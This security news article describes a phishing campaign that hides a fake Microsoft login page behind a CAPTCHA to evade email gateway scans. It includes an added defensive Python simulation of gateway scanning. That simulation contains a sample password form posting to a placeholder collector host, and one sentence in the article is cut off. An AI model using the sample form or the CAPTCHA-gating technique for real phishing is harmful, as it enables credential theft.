How CAPTCHA is being used to bypass anti-malware security scans and firewalls

The Completely Automated Public Turing test to tell Computers and Humans Apart, most commonly known as CAPTCHA, is a system for creating challenges that must be completed before users can advance on a website. According to IT system audit specialists, the main function of a CAPTCHA challenge is to prevent hackers from using automated bots to access certain content because, in theory, only a human being can solve one of these challenges.

This does not mean that a CAPTCHA is free of
security issues. A report from the security company Cofense describes a
new phishing campaign that hides a fake Microsoft login page behind a CAPTCHA
box.

According to IT system audit experts, the operators
of this campaign use the CAPTCHA to stop automated anti-malware analysis from
reaching the real landing page, so a scanner cannot check whether the
page behind it was built to steal visitors' credentials.

Many companies use Secure Email Gateways (SEG)
to scan their incoming emails for malware or indications of other attack
variants. The problem is that an SEG is not able to solve a CAPTCHA
and, as this is not a known attack variant, SEG vendors do not have adequate

“SEGs cannot scan the malicious page, only
the CAPTCHA code site, which does not contain malicious elements, so the SEG
tags it as secure content and allows the user to advance,” the IT system
audit experts mention. Once the recipient of the email solves the CAPTCHA
challenge, they are shown a fake Microsoft login page that captures the
credentials for their company accounts.
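The evasion works because the scanner judges only the page it can reach. The following is an added example, not code from Cofense or from the page: a small simulation of an SEG link scan in which a CAPTCHA gate is served until the challenge is solved, and only then does the credential-harvesting form appear. The two HTML pages and all hostnames are constructed for illustration (the article says the real pages were hosted on Microsoft cloud infrastructure; the `.invalid` hosts here are placeholders). The naive verdict reproduces the behaviour the article describes; the stricter variant treats a gate it cannot pass as unresolved instead of clean, and, when a human solves the challenge, flags a password form that posts to a different host.

```python
import re
from urllib.parse import urlparse

# Constructed sample pages standing in for the two stages of the campaign.
# They are illustrative only, not captured from the real phishing kit.
GATE_URL = "https://storage.example.invalid/voicemail/index.html"  # hypothetical host
GATE_PAGE = """<html><head><title>New voice message</title>
<script src="https://www.google.com/recaptcha/api.js" async defer></script></head>
<body><form method="POST" action="/listen">
<div class="g-recaptcha" data-sitekey="EXAMPLE-SITE-KEY"></div>
<button type="submit">Play message</button></form></body></html>"""

LOGIN_PAGE = """<html><body>
<form method="POST" action="https://collector.example.invalid/login">
<input type="email" name="loginfmt">
<input type="password" name="passwd">
<button type="submit">Sign in</button></form></body></html>"""


def fetch(url, captcha_solved=False):
    """Stand-in for an HTTP client. The site serves the CAPTCHA gate until the
    challenge is solved; only then does the credential-harvesting page appear."""
    if url != GATE_URL:
        raise LookupError(url)
    return LOGIN_PAGE if captcha_solved else GATE_PAGE


# Markers of the common hosted CAPTCHA widgets (script URLs and widget classes).
CAPTCHA_MARKERS = re.compile(
    r'recaptcha/api\.js|hcaptcha\.com/1/api\.js|class="(g-recaptcha|h-captcha)"',
    re.I,
)


def is_captcha_gate(html):
    """True if the page embeds a CAPTCHA widget an automated scanner cannot pass."""
    return CAPTCHA_MARKERS.search(html) is not None


def has_credential_form(html):
    """True if the page contains a password field."""
    return re.search(r'<input[^>]+type="password"', html, re.I) is not None


def form_posts_offsite(html, page_url):
    """True if any form on the page submits to a host other than the one serving it."""
    page_host = urlparse(page_url).hostname
    for action in re.findall(r'<form[^>]+action="([^"]+)"', html, re.I):
        host = urlparse(action).hostname
        if host and host != page_host:
            return True
    return False


def naive_seg_verdict(url):
    """Behaviour the article describes: scan whatever the link returns and call
    it clean when nothing malicious is visible. The gate page has no password
    field, so the verdict is 'clean' even though a phishing page sits behind it."""
    html = fetch(url)
    return "phish" if has_credential_form(html) else "clean"


def strict_seg_verdict(url, solve_captcha=None):
    """Treat a page the scanner cannot get past as unresolved rather than clean.
    If a solver (e.g. a human analyst) is available, look at what is behind the
    gate and escalate when a credential form posts to a third-party host."""
    html = fetch(url)
    if is_captcha_gate(html):
        if solve_captcha is None:
            return "unresolved-gate"
        html = fetch(url, captcha_solved=solve_captcha())
    if has_credential_form(html):
        return "phish" if form_posts_offsite(html, url) else "suspicious-login-form"
    return "clean"


if __name__ == "__main__":
    print("naive       :", naive_seg_verdict(GATE_URL))
    print("strict      :", strict_seg_verdict(GATE_URL))
    print("strict+human:", strict_seg_verdict(GATE_URL, solve_captcha=lambda: True))
```

The design point is the return value for the blocked case: an "unresolved-gate" result should be routed to hold-and-review or to a sandbox with a human in the loop, not collapsed into "clean" just because the scanner saw no malicious markup on the only page it could fetch.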

Specialists found that the phishing link is sent
from an email account that has been hijacked by the campaign operators.
The message poses as a notification about a new voice mail message, and
both the phishing page and the CAPTCHA used by the attackers are hosted on
Microsoft cloud servers.

These kinds of attacks make it difficult for
people or automated scanners to detect that a page is not legitimate. SEG
technology typically relies heavily on the reputation of the domain from which an
email is sent and of the domain it links to; in this case, because the phishing
page is hosted on a Microsoft cloud server with a trusted reputation, this
protective measure is easy for the attackers to bypass.

Experts in IT system audit from the
International Institute of Cyber Security (IICS) say they are concerned about
the ability of threat actors to turn techniques normally used against them
into an advantage over their victims. In this case they have taken advantage of
CAPTCHA, but they have also been shown to be able to exploit HTTPS
encryption, cryptographic signatures and other protective measures to disrupt
anti-malware analysis.
